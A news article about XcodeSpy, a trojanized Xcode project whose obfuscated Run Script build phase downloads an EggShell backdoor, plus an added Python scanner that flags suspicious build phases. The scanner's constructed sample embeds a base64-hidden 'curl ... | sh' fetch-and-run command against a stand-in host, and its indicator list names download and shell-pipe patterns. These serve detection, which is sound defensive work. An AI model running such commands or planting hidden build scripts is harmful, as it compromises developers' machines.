Researchers said they have found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.
It came in the form of a malicious project the attacker wrote for Xcode, a developer tool that Apple makes freely available to developers who write apps for iOS or any other Apple OS. The project was a copy of TabBarInteraction, a legitimate open source project that makes it easier for developers to animate iOS tab bars based on user interaction. An Xcode project is a repository for all the files, resources, and information needed to build an app.
Walking on eggshells
Alongside the legitimate code was an obfuscated Run Script, a build phase that Xcode executes automatically as part of a build. The script, which ran whenever the developer's build target was launched, contacted an attacker-controlled server to download and install a modified version of EggShell, an open source backdoor that lets an attacker spy on users through their microphone, camera and keyboard.
Researchers at SentinelOne, the security company that discovered the trojanized project, have named it XcodeSpy. They have found two variants of the modified EggShell dropped by the malicious project. Both were uploaded to VirusTotal through the web interface from Japan, the first on August 5 and the second on October 13, 2020.
“The later sample was also found in the wild on a victim’s Mac in the United States in late 2020,” SentinelOne researcher Phil Stokes wrote in a blog post on Thursday. “For confidentiality reasons, we are unable to provide further details about the ITW [in the wild] incident. However, the victim reported that they were repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities.”
So far, researchers are aware of only one in-the-wild case, involving a US-based organization. Evidence from the SentinelOne analysis suggests that the campaign was "in operation at least between July and October 2020 and may have also targeted developers in Asia".
Researchers under fire
Thursday's report came two months after researchers from both Microsoft and Google said hackers backed by the North Korean government were actively trying to infect the computers of security researchers. To gain the researchers' trust, the hackers spent weeks building Twitter personas and developing working relationships online.
Eventually, the fake Twitter profiles asked the researchers to open a webpage in Internet Explorer. Those who took the bait found that their fully patched Windows 10 machines had a malicious service and an in-memory backdoor installed. Microsoft patched the vulnerability last week.
In addition to the watering-hole attack, the hackers also sent targeted researchers a Visual Studio project that supposedly contained the source code for a proof-of-concept exploit. The project contained malware that contacted the attackers' control server.
Experienced developers have long known the importance of checking for Run Script build phases before building any third-party Xcode project. While detecting the scripts isn't difficult, XcodeSpy tried to make the job harder by obfuscating its script.
Once decoded, the script was seen to contact a server at cralev[.]me and issue the mysterious mdbcmd command via a reverse shell.
The only warning a developer would get after building the Xcode project would be something that looks like this:
SentinelOne provides a script that makes it easy for developers to find Run Scripts in their projects. Thursday's post also provides indicators of compromise to help developers determine whether they were targeted or infected.
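SentinelOne's own helper script is not reproduced here. What follows is an added example, not code from the original article or from SentinelOne: a Python scanner that lists every Run Script build phase in a project.pbxproj (Xcode stores them as PBXShellScriptBuildPhase objects), decodes any base64 blob it finds in a script, and flags the fetch-and-run primitives an obfuscated phase typically hides. The embedded project fragment is constructed for the example, with one harmless lint step and one hypothetical phase that evals a base64-encoded download command pointing at example.invalid; the indicator list is my own and marks reasons to read a script, not a verdict.

```python
# Added example (not SentinelOne's helper): enumerate Run Script build phases in a
# project.pbxproj and flag obfuscation or download-and-execute patterns in them.
import base64
import re
import sys
from dataclasses import dataclass, field
from pathlib import Path
# One object in the pbxproj's OpenStep-style plist:  ID /* name */ = { ... };
OBJECT_RE = re.compile(
    r'(?P<id>[0-9A-Fa-f]{6,32})\s*(?:/\*\s*(?P<name>.*?)\s*\*/)?\s*=\s*\{(?P<body>[^{}]*)\}', re.S)
B64_RE = re.compile(r'[A-Za-z0-9+/]{32,}={0,2}')

# (regex, why): primitives of obfuscated or fetch-and-run scripts; a hit means "read this", not "malicious".
INDICATORS = [
    (r'\bbase64\b.*?(-d\b|-D\b|--decode)', 'base64-decoded payload'),
    (r'\beval\b', 'eval of generated text'),
    (r'\b(curl|wget)\b', 'network download'),
    (r'\|\s*(ba|z)?sh\b', 'piped into a shell'),
    (r'\b(python3?|perl|ruby|osascript)\s+-[ce]\b', 'inline interpreter one-liner'),
]

def _value(body, key):
    """Read `key = value;` from an object body; quoted values get pbxproj escapes undone."""
    m = re.search(r'\b' + key + r'\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;]+));', body, re.S)
    if not m:
        return ''
    if m.group(1) is None:
        return m.group(2).strip()
    return re.sub(r'\\(.)', lambda e: {'n': '\n', 't': '\t'}.get(e.group(1), e.group(1)), m.group(1), flags=re.S)

@dataclass
class RunScript:
    object_id: str
    name: str
    shell_path: str
    script: str
    flags: list = field(default_factory=list)    # indicator descriptions that matched
    decoded: list = field(default_factory=list)  # plaintext of base64 blobs found in the script

def _indicators(text, prefix=''):
    return [prefix + why for pat, why in INDICATORS if re.search(pat, text, re.M)]

def scan_pbxproj_text(text):
    """Return a RunScript for every PBXShellScriptBuildPhase object in the file text."""
    found = []
    for m in OBJECT_RE.finditer(text):
        body = m.group('body')
        if not re.search(r'\bisa\s*=\s*PBXShellScriptBuildPhase\s*;', body):
            continue
        rs = RunScript(m.group('id'), (m.group('name') or '').strip(),
                       _value(body, 'shellPath') or '/bin/sh', _value(body, 'shellScript'))
        rs.flags = _indicators(rs.script)
        # "echo <blob> | base64 --decode | sh" is the usual way to hide a fetch-and-run,
        # so decode every valid base64 blob and scan the plaintext as well.
        for blob in B64_RE.findall(rs.script):
            try:
                plain = base64.b64decode(blob, validate=True).decode('utf-8')
            except (ValueError, UnicodeDecodeError):
                continue
            rs.decoded.append(plain)
            rs.flags += _indicators(plain, 'decoded: ')
        found.append(rs)
    return found

def report(phases):
    out = []
    for p in phases:
        out.append(f"[{'REVIEW' if p.flags else 'ok'}] {p.object_id} {p.name!r} via {p.shell_path}")
        out += [f'    - {why}' for why in p.flags]
        out += [f'    decoded: {plain.strip()}' for plain in p.decoded]
        out.append('    ' + p.script.strip().replace('\n', '\n    '))
    return '\n'.join(out) or 'no Run Script phases'

# Constructed sample, not a real project: a harmless lint step plus a hypothetical phase that
# evals a base64 blob hiding a download piped into sh (the payload is never executed by this tool).
_PAYLOAD = 'curl -s https://example.invalid/drop | sh'
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        A1B2C3A1B2C3A1B2C3A1B2C3 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        D4E5F6D4E5F6D4E5F6D4E5F6 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "eval \"$(echo __BLOB__ | base64 --decode)\"\n";
        };
    };
}
'''.replace('__BLOB__', base64.b64encode(_PAYLOAD.encode()).decode())

if __name__ == '__main__':
    # Usage: python3 scan_runscripts.py Some.xcodeproj [...]; with no arguments, scans the sample.
    files = [f for a in sys.argv[1:] for f in sorted(Path(a).rglob('project.pbxproj'))]
    for pbx in files:
        print(f'== {pbx}\n' + report(scan_pbxproj_text(pbx.read_text(errors='replace'))))
    if not files:
        print(report(scan_pbxproj_text(SAMPLE_PBXPROJ)))
```

Run it against a freshly cloned .xcodeproj before the first build, since Xcode executes the phase during the build and a check afterwards is too late. Treat the output as a reading list rather than a verdict: a phase with no hits can still fetch and run code through a path the indicator list does not cover, so every script the tool prints is worth reading in full, including those in vendored dependencies.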
A vector for malice
This is not the first time Xcode has been used in a malware attack. Last August, researchers discovered Xcode projects available online that contained exploits for what were at the time two zero-day vulnerabilities in Safari. As soon as one of the XCSSET projects was opened and built, a Trend Micro analysis found, the malicious code would run on the developer's Mac.
And in 2015, researchers found some 4,000 iOS apps infected by XcodeGhost, the name given to a tampered-with copy of Xcode that circulated mainly in Asia. Apps compiled with XcodeGhost could be used by attackers to read and write the device clipboard, open specific URLs, and exfiltrate data.
Unlike XcodeGhost, which infected apps, XcodeSpy targeted the developers themselves. Given the quality of the surveillance backdoor XcodeSpy installs, it wouldn't be difficult for the attackers to eventually deliver malware to users of the developer's software as well.
“There are other scenarios with such valuable victims,” SentinelOne’s Stokes wrote. “Attackers can simply look for interesting targets and collect data for future campaigns, or they can try to collect AppleID credentials for use in other campaigns that use malware with valid Apple Developer code signatures. These suggestions do not exhaust the possibilities nor are they mutually exclusive.”